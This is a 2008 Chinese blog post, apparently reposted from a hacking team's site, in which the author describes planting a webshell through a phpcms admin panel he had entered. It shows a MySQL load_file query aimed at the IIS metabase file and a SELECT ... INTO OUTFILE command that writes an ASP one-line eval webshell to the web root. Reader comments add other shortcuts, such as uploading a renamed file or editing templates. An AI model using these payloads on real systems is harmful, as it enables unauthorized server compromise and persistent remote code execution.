百度空间 | 百度首页 
 
查看文章
 
phpcms后台拿webshell
2008-10-23 01:20
文章作者:co14[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://www.00day.cn)

phpcms后台拿webshell

刚写了个利用工具,想试试拿个webshell玩,费了不少力气才进了个后台
环境:windows+IIS,root
不熟悉这程序,小弟不才,一时还不知道怎么弄
周围看了下,可以执行sql,先试试能否load_file,因为注点里load出来得文件才看到那么一小段
先读c:\\windows\system32\\inetsrv\\metabase.xml试试
select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C)
结果,,,,




没回显...晕乎,
继续转转,发现了个环境变量




得到物理路径




回到sql执行,导出webshell:
既然是IIS,直接用asp的一句话算了
select/**/'<%eval request("sb")%>'/**/into/**/outfile/**/'E:\\xxxx\\1x.asp'/*




访问




..过程比较顺利,,RP大爆发的说
各位不要BS我,,,,

类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (4)
 
最近读者:
 
网友评论:
1
2008-10-23 01:54 | 回复
挖. 挖. 挖. 挖. 挖. 沙 发 .
 
2
2008-10-23 11:05 | 回复
挖. 挖. 挖. 挖. 挖. 沙 发
 
3
2008-10-30 18:15 | 回复
phpcms有文件管理器 直接上传jpg然后改名就行- -!
 
4
2009-06-20 22:14 | 回复
这个太麻烦了也,直接改模板就可以了。
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu